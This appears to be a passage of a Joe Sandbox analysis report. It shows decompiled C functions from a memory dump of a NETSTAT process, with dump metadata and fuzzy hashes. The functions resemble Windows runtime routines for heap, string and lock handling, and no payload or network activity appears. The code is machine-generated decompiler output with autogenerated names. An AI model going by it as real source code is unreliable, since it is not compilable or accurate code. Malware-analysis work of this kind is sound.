                                      					_t39 = 0;
                                      					goto L11;
                                      				}
                                      				_t77 =  *((intOrPtr*)(_t83 + 8));
                                      				_t68 = E02E9A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
                                      				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
                                      				if(_t68 < 0) {
                                      					goto L14;
                                      				}
                                      				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
                                      				goto L6;
                                      			}



















                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • Opcode ID: 290b24ab9c5bdc32ee7372e29a6c703b33782e1c9d86a1a74028a7b266e67d84
                                      • Instruction ID: 56cafded45683e7d08af337d9bdf2a5280591d327bef332e991a8c79b6d632ca
                                      • Opcode Fuzzy Hash: 290b24ab9c5bdc32ee7372e29a6c703b33782e1c9d86a1a74028a7b266e67d84
                                      • Instruction Fuzzy Hash: 414158B5A80219DFCF09CF58C890B99BBF2BF49308F15D0AAE909AB345C775A941CF54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E02EA3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                      				intOrPtr _v8;
                                      				char _v12;
                                      				signed short** _t33;
                                      				short* _t38;
                                      				intOrPtr* _t39;
                                      				intOrPtr* _t41;
                                      				signed short _t43;
                                      				intOrPtr* _t47;
                                      				intOrPtr* _t53;
                                      				signed short _t57;
                                      				intOrPtr _t58;
                                      				signed short _t60;
                                      				signed short* _t61;
                                      
                                      				_t47 = __ecx;
                                      				_t61 = __edx;
                                      				_t60 = ( *__ecx & 0x0000ffff) + 2;
                                      				if(_t60 > 0xfffe) {
                                      					L22:
                                      					return 0xc0000106;
                                      				}
                                      				if(__edx != 0) {
                                      					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
                                      						L5:
                                      						E02E77B60(0, _t61, 0x2e411c4);
                                      						_v12 =  *_t47;
                                      						_v12 = _v12 + 0xfff8;
                                      						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
                                      						E02E77B60(0xfff8, _t61,  &_v12);
                                      						_t33 = _a8;
                                      						if(_t33 != 0) {
                                      							 *_t33 = _t61;
                                      						}
                                      						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
                                      						_t53 = _a12;
                                      						if(_t53 != 0) {
                                      							_t57 = _t61[2];
                                      							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
                                      							while(_t38 >= _t57) {
                                      								if( *_t38 == 0x5c) {
                                      									_t41 = _t38 + 2;
                                      									if(_t41 == 0) {
                                      										break;
                                      									}
                                      									_t58 = 0;
                                      									if( *_t41 == 0) {
                                      										L19:
                                      										 *_t53 = _t58;
                                      										goto L7;
                                      									}
                                      									 *_t53 = _t41;
                                      									goto L7;
                                      								}
                                      								_t38 = _t38 - 2;
                                      							}
                                      							_t58 = 0;
                                      							goto L19;
                                      						} else {
                                      							L7:
                                      							_t39 = _a16;
                                      							if(_t39 != 0) {
                                      								 *_t39 = 0;
                                      								 *((intOrPtr*)(_t39 + 4)) = 0;
                                      								 *((intOrPtr*)(_t39 + 8)) = 0;
                                      								 *((intOrPtr*)(_t39 + 0xc)) = 0;
                                      							}
                                      							return 0;
                                      						}
                                      					}
                                      					_t61 = _a4;
                                      					if(_t61 != 0) {
                                      						L3:
                                      						_t43 = L02E84620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
                                      						_t61[2] = _t43;
                                      						if(_t43 == 0) {
                                      							return 0xc0000017;
                                      						}
                                      						_t61[1] = _t60;
                                      						 *_t61 = 0;
                                      						goto L5;
                                      					}
                                      					goto L22;
                                      				}
                                      				_t61 = _a4;
                                      				if(_t61 == 0) {
                                      					return 0xc000000d;
                                      				}
                                      				goto L3;
                                      			}

















                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • Opcode ID: 75c730c2ef6d19bdb391927f4d6e44e4036087a5124731771fd96e09570d3e7b
                                      • Instruction ID: 6e9f2b8e8ee850506ba2de5fd2773f7f8c7a259f39ecd5a14bb7cc5cd715c368
                                      • Opcode Fuzzy Hash: 75c730c2ef6d19bdb391927f4d6e44e4036087a5124731771fd96e09570d3e7b
                                      • Instruction Fuzzy Hash: 9931CE35A85615DBC7248F29D865A7BBBF5EF46708B09E0AAF849CF350E730E841C790
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 76%
                                      			E02EE7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
                                      				signed int _v8;
                                      				char _v588;
                                      				intOrPtr _v592;
                                      				intOrPtr _v596;
                                      				signed short* _v600;
                                      				char _v604;
                                      				short _v606;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				signed short* _t55;
                                      				void* _t56;
                                      				signed short* _t58;
                                      				signed char* _t61;
                                      				char* _t68;
                                      				void* _t69;
                                      				void* _t71;
                                      				void* _t72;
                                      				signed int _t75;
                                      
                                      				_t64 = __edx;
                                      				_t77 = (_t75 & 0xfffffff8) - 0x25c;
                                      				_v8 =  *0x2f5d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
                                      				_t55 = _a16;
                                      				_v606 = __ecx;
                                      				_t71 = 0;
                                      				_t58 = _a12;
                                      				_v596 = __edx;
                                      				_v600 = _t58;
                                      				_t68 =  &_v588;
                                      				if(_t58 != 0) {
                                      					_t71 = ( *_t58 & 0x0000ffff) + 2;
                                      					if(_t55 != 0) {
                                      						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
                                      					}
                                      				}
                                      				_t8 = _t71 + 0x2a; // 0x28
                                      				_t33 = _t8;
                                      				_v592 = _t8;
                                      				if(_t71 <= 0x214) {
                                      					L6:
                                      					 *((short*)(_t68 + 6)) = _v606;
                                      					if(_t64 != 0xffffffff) {
                                      						asm("cdq");
                                      						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
                                      						 *((char*)(_t68 + 0x28)) = _a4;
                                      						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
                                      						 *((char*)(_t68 + 0x29)) = _a8;
                                      						if(_t71 != 0) {
                                      							_t22 = _t68 + 0x2a; // 0x2a
                                      							_t64 = _t22;
                                      							E02EE6B4C(_t58, _t22, _t71,  &_v604);
                                      							if(_t55 != 0) {
                                      								_t25 = _v604 + 0x2a; // 0x2a
                                      								_t64 = _t25 + _t68;
                                      								E02EE6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
                                      							}
                                      							if(E02E87D50() == 0) {
                                      								_t61 = 0x7ffe0384;
                                      							} else {
                                      								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                      							}
                                      							_push(_t68);
                                      							_push(_v592 + 0xffffffe0);
                                      							_push(0x402);
                                      							_push( *_t61 & 0x000000ff);
                                      							E02EA9AE0();
                                      						}
                                      					}
                                      					_t35 =  &_v588;
                                      					if( &_v588 != _t68) {
                                      						_t35 = L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
                                      					}
                                      					L16:
                                      					_pop(_t69);
                                      					_pop(_t72);
                                      					_pop(_t56);
                                      					return E02EAB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
                                      				}
                                      				_t68 = L02E84620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
                                      				if(_t68 == 0) {
                                      					goto L16;
                                      				} else {
                                      					_t58 = _v600;
                                      					_t64 = _v596;
                                      					goto L6;
                                      				}
                                      			}























                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8cd7f7c56c56e0861bdce4f1d1f67f20086dd5f14fc334d1135ab1f3744efc9e
                                      • Instruction ID: 5cf9dd0d7ab3e4b003f60843fdb52bbe18d3ae1091f355553bd130a133bc3663
                                      • Opcode Fuzzy Hash: 8cd7f7c56c56e0861bdce4f1d1f67f20086dd5f14fc334d1135ab1f3744efc9e
                                      • Instruction Fuzzy Hash: 6131C4726447519FC720DF68C940A6AF3E9FFC8704F048A29F89A87694E730E904CBA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 68%
                                      			E02E8C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
                                      				signed int* _v8;
                                      				char _v16;
                                      				void* __ebx;
                                      				void* __edi;
                                      				signed char _t33;
                                      				signed char _t43;
                                      				signed char _t48;
                                      				signed char _t62;
                                      				void* _t63;
                                      				intOrPtr _t69;
                                      				intOrPtr _t71;
                                      				unsigned int* _t82;
                                      				void* _t83;
                                      
                                      				_t80 = __ecx;
                                      				_t82 = __edx;
                                      				_t33 =  *((intOrPtr*)(__ecx + 0xde));
                                      				_t62 = _t33 >> 0x00000001 & 0x00000001;
                                      				if((_t33 & 0x00000001) != 0) {
                                      					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
                                      					if(E02E87D50() != 0) {
                                      						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                      					} else {
                                      						_t43 = 0x7ffe0386;
                                      					}
                                      					if( *_t43 != 0) {
                                      						_t43 = E02F38D34(_v8, _t80);
                                      					}
                                      					E02E82280(_t43, _t82);
                                      					if( *((char*)(_t80 + 0xdc)) == 0) {
                                      						E02E7FFB0(_t62, _t80, _t82);
                                      						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
                                      						_t30 = _t80 + 0xd0; // 0xd0
                                      						_t83 = _t30;
                                      						E02F38833(_t83,  &_v16);
                                      						_t81 = _t80 + 0x90;
                                      						E02E7FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
                                      						_t63 = 0;
                                      						_push(0);
                                      						_push(_t83);
                                      						_t48 = E02EAB180();
                                      						if(_a4 != 0) {
                                      							E02E82280(_t48, _t81);
                                      						}
                                      					} else {
                                      						_t69 = _v8;
                                      						_t12 = _t80 + 0x98; // 0x98
                                      						_t13 = _t69 + 0xc; // 0x575651ff
                                      						E02E8BB2D(_t13, _t12);
                                      						_t71 = _v8;
                                      						_t15 = _t80 + 0xb0; // 0xb0
                                      						_t16 = _t71 + 8; // 0x8b000cc2
                                      						E02E8BB2D(_t16, _t15);
                                      						E02E8B944(_v8, _t62);
                                      						 *((char*)(_t80 + 0xdc)) = 0;
                                      						E02E7FFB0(0, _t80, _t82);
                                      						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
                                      						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
                                      						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
                                      						 *(_t80 + 0xde) = 0;
                                      						if(_a4 == 0) {
                                      							_t25 = _t80 + 0x90; // 0x90
                                      							E02E7FFB0(0, _t80, _t25);
                                      						}
                                      						_t63 = 1;
                                      					}
                                      					return _t63;
                                      				}
                                      				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
                                      				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
                                      				if(_a4 == 0) {
                                      					_t24 = _t80 + 0x90; // 0x90
                                      					E02E7FFB0(0, __ecx, _t24);
                                      				}
                                      				return 0;
                                      			}

















                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                      • Instruction ID: 307d636bc65c1e691892ef54769284124cec08aca9c581c7184d30bf4727b138
                                      • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                      • Instruction Fuzzy Hash: AC312471681586AED708FBF4C880BE9F765BF43208F14E15BE55C87241DB386A06CBB1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 92%
                                      			E02E9A70E(intOrPtr* __ecx, char* __edx) {
                                      				unsigned int _v8;
                                      				intOrPtr* _v12;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				void* _t16;
                                      				intOrPtr _t17;
                                      				intOrPtr _t28;
                                      				char* _t33;
                                      				intOrPtr _t37;
                                      				intOrPtr _t38;
                                      				void* _t50;
                                      				intOrPtr _t52;
                                      
                                      				_push(__ecx);
                                      				_push(__ecx);
                                      				_t52 =  *0x2f57b10; // 0x8
                                      				_t33 = __edx;
                                      				_t48 = __ecx;
                                      				_v12 = __ecx;
                                      				if(_t52 == 0) {
                                      					 *0x2f57b10 = 8;
                                      					 *0x2f57b14 = 0x2f57b0c;
                                      					 *0x2f57b18 = 1;
                                      					L6:
                                      					_t2 = _t52 + 1; // 0x9
                                      					E02E9A990(0x2f57b10, _t2, 7);
                                      					asm("bts ecx, eax");
                                      					 *_t48 = _t52;
                                      					 *_t33 = 1;
                                      					L3:
                                      					_t16 = 0;
                                      					L4:
                                      					return _t16;
                                      				}
                                      				_t17 = L02E9A840(__edx, __ecx, __ecx, _t52, 0x2f57b10, 1, 0);
                                      				if(_t17 == 0xffffffff) {
                                      					_t37 =  *0x2f57b10; // 0x8
                                      					_t3 = _t37 + 0x27; // 0x2f
                                      					__eflags = _t3 >> 5 -  *0x2f57b18; // 0x1
                                      					if(__eflags > 0) {
                                      						_t38 =  *0x2f57b9c; // 0x0
                                      						_t4 = _t52 + 0x27; // 0x2f
                                      						_v8 = _t4 >> 5;
                                      						_t50 = L02E84620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
                                      						__eflags = _t50;
                                      						if(_t50 == 0) {
                                      							_t16 = 0xc0000017;
                                      							goto L4;
                                      						}
                                      						 *0x2f57b18 = _v8;
                                      						_t8 = _t52 + 7; // 0xf
                                      						E02EAF3E0(_t50,  *0x2f57b14, _t8 >> 3);
                                      						_t28 =  *0x2f57b14; // 0x776f7b0c
                                      						__eflags = _t28 - 0x2f57b0c;
                                      						if(_t28 != 0x2f57b0c) {
                                      							L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                      						}
                                      						_t9 = _t52 + 8; // 0x10
                                      						 *0x2f57b14 = _t50;
                                      						_t48 = _v12;
                                      						 *0x2f57b10 = _t9;
                                      						goto L6;
                                      					}
                                      					 *0x2f57b10 = _t37 + 8;
                                      					goto L6;
                                      				}
                                      				 *__ecx = _t17;
                                      				 *_t33 = 0;
                                      				goto L3;
                                      			}

















                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8b3f47893dc622c04694aec0de484efef88f8d49131622b6ac4ba33a0f32595a
                                      • Instruction ID: af62e0d1ebd27bb62761ded33799abf33b0d05e377fc23706cb9e42b8511e74c
                                      • Opcode Fuzzy Hash: 8b3f47893dc622c04694aec0de484efef88f8d49131622b6ac4ba33a0f32595a
                                      • Instruction Fuzzy Hash: 6731C5B1A80718AFD711EF08D891F55F7F5FB84758F148D6AE20587344D3719912CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 95%
                                      			E02E6AA16(signed short* __ecx) {
                                      				signed int _v8;
                                      				intOrPtr _v12;
                                      				signed short _v16;
                                      				intOrPtr _v20;
                                      				signed short _v24;
                                      				signed short _v28;
                                      				void* _v32;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				intOrPtr _t25;
                                      				signed short _t38;
                                      				signed short* _t42;
                                      				signed int _t44;
                                      				signed short* _t52;
                                      				signed short _t53;
                                      				signed int _t54;
                                      
                                      				_v8 =  *0x2f5d360 ^ _t54;
                                      				_t42 = __ecx;
                                      				_t44 =  *__ecx & 0x0000ffff;
                                      				_t52 =  &(__ecx[2]);
                                      				_t51 = _t44 + 2;
                                      				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
                                      					L4:
                                      					_t25 =  *0x2f57b9c; // 0x0
                                      					_t53 = L02E84620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
                                      					__eflags = _t53;
                                      					if(_t53 == 0) {
                                      						L3:
                                      						return E02EAB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
                                      					} else {
                                      						E02EAF3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
                                      						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
                                      						L2:
                                      						_t51 = 4;
                                      						if(L02E76C59(_t53, _t51, _t58) != 0) {
                                      							_t28 = E02E95E50(0x2e4c338, 0, 0,  &_v32);
                                      							__eflags = _t28;
                                      							if(_t28 == 0) {
                                      								_t38 = ( *_t42 & 0x0000ffff) + 2;
                                      								__eflags = _t38;
                                      								_v24 = _t53;
                                      								_v16 = _t38;
                                      								_v20 = 0;
                                      								_v12 = 0;
                                      								E02E9B230(_v32, _v28, 0x2e4c2d8, 1,  &_v24);
                                      								_t28 = E02E6F7A0(_v32, _v28);
                                      							}
                                      							__eflags = _t53 -  *_t52;
                                      							if(_t53 !=  *_t52) {
                                      								_t28 = L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                                      							}
                                      						}
                                      						goto L3;
                                      					}
                                      				}
                                      				_t53 =  *_t52;
                                      				_t44 = _t44 >> 1;
                                      				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
                                      				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
                                      					goto L4;
                                      				}
                                      				goto L2;
                                      			}





















                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • Opcode ID: 99803657b8b338d46f872d8a800b5b4a1ea9b86dab5b99657c1ec61ebd7c468d
                                      • Instruction ID: ee19dd93230b422c627efa74c2cd95084c728dff72a77e03b8eb5de342c13958
                                      • Opcode Fuzzy Hash: 99803657b8b338d46f872d8a800b5b4a1ea9b86dab5b99657c1ec61ebd7c468d
                                      • Instruction Fuzzy Hash: E531E571A80219ABDF10AFA4CD51ABFB7B9FF04704B10946AF905EB240E7759D11DBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 97%
                                      			E02E961A0(signed int* __ecx) {
                                      				intOrPtr _v8;
                                      				char _v12;
                                      				intOrPtr* _v16;
                                      				intOrPtr _v20;
                                      				intOrPtr _t30;
                                      				intOrPtr _t31;
                                      				void* _t32;
                                      				intOrPtr _t33;
                                      				intOrPtr _t37;
                                      				intOrPtr _t49;
                                      				signed int _t51;
                                      				intOrPtr _t52;
                                      				signed int _t54;
                                      				void* _t59;
                                      				signed int* _t61;
                                      				intOrPtr* _t64;
                                      
                                      				_t61 = __ecx;
                                      				_v12 = 0;
                                      				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                      				_v16 = __ecx;
                                      				_v8 = 0;
                                      				if(_t30 == 0) {
                                      					L6:
                                      					_t31 = 0;
                                      					L7:
                                      					return _t31;
                                      				}
                                      				_t32 = _t30 + 0x5d8;
                                      				if(_t32 == 0) {
                                      					goto L6;
                                      				}
                                      				_t59 = _t32 + 0x30;
                                      				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
                                      					goto L6;
                                      				}
                                      				if(__ecx != 0) {
                                      					 *((intOrPtr*)(__ecx)) = 0;
                                      					 *((intOrPtr*)(__ecx + 4)) = 0;
                                      				}
                                      				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
                                      					_t51 =  *(_t32 + 0x10);
                                      					_t33 = _t32 + 0x10;
                                      					_v20 = _t33;
                                      					_t54 =  *(_t33 + 4);
                                      					if((_t51 | _t54) == 0) {
                                      						_t37 = E02E95E50(0x2e467cc, 0, 0,  &_v12);
                                      						if(_t37 != 0) {
                                      							goto L6;
                                      						}
                                      						_t52 = _v8;
                                      						asm("lock cmpxchg8b [esi]");
                                      						_t64 = _v16;
                                      						_t49 = _t37;
                                      						_v20 = 0;
                                      						if(_t37 == 0) {
                                      							if(_t64 != 0) {
                                      								 *_t64 = _v12;
                                      								 *((intOrPtr*)(_t64 + 4)) = _t52;
                                      							}
                                      							E02F39D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
                                      							_t31 = 1;
                                      							goto L7;
                                      						}
                                      						E02E6F7C0(_t52, _v12, _t52, 0);
                                      						if(_t64 != 0) {
                                      							 *_t64 = _t49;
                                      							 *((intOrPtr*)(_t64 + 4)) = _v20;
                                      						}
                                      						L12:
                                      						_t31 = 1;
                                      						goto L7;
                                      					}
                                      					if(_t61 != 0) {
                                      						 *_t61 = _t51;
                                      						_t61[1] = _t54;
                                      					}
                                      					goto L12;
                                      				} else {
                                      					goto L6;
                                      				}
                                      			}

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • Opcode ID: cb65dfd29bb79ab3a2e4296975a96f4fe196a58fedee805a58cfce567c236259
                                      • Instruction ID: 1a0134864fa6d9050d17771ae1223d0c300b2be1119f5f53ad50fa6e746587ae
                                      • Opcode Fuzzy Hash: cb65dfd29bb79ab3a2e4296975a96f4fe196a58fedee805a58cfce567c236259
                                      • Instruction Fuzzy Hash: 0D3181716453018FD720CF19C940B26F7E9FB88B08F05996EF99997351E7B0E845CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 58%
                                      			E02EA4A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
                                      				signed int _v8;
                                      				signed int* _v12;
                                      				char _v13;
                                      				signed int _v16;
                                      				char _v21;
                                      				signed int* _v24;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				signed int _t29;
                                      				signed int* _t32;
                                      				signed int* _t41;
                                      				signed int _t42;
                                      				void* _t43;
                                      				intOrPtr* _t51;
                                      				void* _t52;
                                      				signed int _t53;
                                      				signed int _t58;
                                      				void* _t59;
                                      				signed int _t60;
                                      				signed int _t62;
                                      
                                      				_t49 = __edx;
                                      				_t62 = (_t60 & 0xfffffff8) - 0xc;
                                      				_t26 =  *0x2f5d360 ^ _t62;
                                      				_v8 =  *0x2f5d360 ^ _t62;
                                      				_t41 = __ecx;
                                      				_t51 = __edx;
                                      				_v12 = __ecx;
                                      				if(_a4 == 0) {
                                      					if(_a8 != 0) {
                                      						goto L1;
                                      					}
                                      					_v13 = 1;
                                      					E02E82280(_t26, 0x2f58608);
                                      					_t58 =  *_t41;
                                      					if(_t58 == 0) {
                                      						L11:
                                      						E02E7FFB0(_t41, _t51, 0x2f58608);
                                      						L2:
                                      						 *0x2f5b1e0(_a4, _a8);
                                      						_t42 =  *_t51();
                                      						if(_t42 == 0) {
                                      							_t29 = 0;
                                      							L5:
                                      							_pop(_t52);
                                      							_pop(_t59);
                                      							_pop(_t43);
                                      							return E02EAB640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
                                      						}
                                      						 *((intOrPtr*)(_t42 + 0x34)) = 1;
                                      						if(_v21 != 0) {
                                      							_t53 = 0;
                                      							E02E82280(_t28, 0x2f58608);
                                      							_t32 = _v24;
                                      							if( *_t32 == _t58) {
                                      								 *_t32 = _t42;
                                      								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
                                      								if(_t58 != 0) {
                                      									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
                                      									asm("sbb edi, edi");
                                      									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
                                      								}
                                      							}
                                      							E02E7FFB0(_t42, _t53, 0x2f58608);
                                      							if(_t53 != 0) {
                                      								L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                                      							}
                                      						}
                                      						_t29 = _t42;
                                      						goto L5;
                                      					}
                                      					if( *((char*)(_t58 + 0x40)) != 0) {
                                      						L10:
                                      						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
                                      						E02E7FFB0(_t41, _t51, 0x2f58608);
                                      						_t29 = _t58;
                                      						goto L5;
                                      					}
                                      					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                      					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                      						goto L11;
                                      					}
                                      					goto L10;
                                      				}
                                      				L1:
                                      				_v13 = 0;
                                      				_t58 = 0;
                                      				goto L2;
                                      			}

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • Opcode ID: 4922afc5cdd616132720ca0dc08ea9a4aad328b58df1e5ee3c0deb846e280eea
                                      • Instruction ID: 248a4cb609930f733fd0c1dde7609da9930ac66d5e9ed942bed19422b815504b
                                      • Opcode Fuzzy Hash: 4922afc5cdd616132720ca0dc08ea9a4aad328b58df1e5ee3c0deb846e280eea
                                      • Instruction Fuzzy Hash: F031D332285350DBDB21EF64C955B2ABBE5FF80758F01A519E95B4B680DBB0E840CF86
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 93%
                                      			E02EA8EC7(void* __ecx, void* __edx) {
                                      				signed int _v8;
                                      				signed int* _v16;
                                      				intOrPtr _v20;
                                      				signed int* _v24;
                                      				char* _v28;
                                      				signed int* _v32;
                                      				intOrPtr _v36;
                                      				signed int* _v40;
                                      				signed int* _v44;
                                      				signed int* _v48;
                                      				intOrPtr _v52;
                                      				signed int* _v56;
                                      				signed int* _v60;
                                      				signed int* _v64;
                                      				intOrPtr _v68;
                                      				signed int* _v72;
                                      				char* _v76;
                                      				signed int* _v80;
                                      				signed int _v84;
                                      				signed int* _v88;
                                      				intOrPtr _v92;
                                      				signed int* _v96;
                                      				intOrPtr _v100;
                                      				signed int* _v104;
                                      				signed int* _v108;
                                      				char _v140;
                                      				signed int _v144;
                                      				signed int _v148;
                                      				signed int* _v152;
                                      				char _v156;
                                      				signed int* _v160;
                                      				char _v164;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				void* _t67;
                                      				intOrPtr _t70;
                                      				void* _t71;
                                      				void* _t72;
                                      				signed int _t73;
                                      
                                      				_t69 = __edx;
                                      				_v8 =  *0x2f5d360 ^ _t73;
                                      				_t48 =  *[fs:0x30];
                                      				_t72 = __edx;
                                      				_t71 = __ecx;
                                      				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
                                      					_t48 = E02E94E70(0x2f586e4, 0x2ea9490, 0, 0);
                                      					if( *0x2f553e8 > 5 && E02EA8F33(0x2f553e8, 0, 0x2000) != 0) {
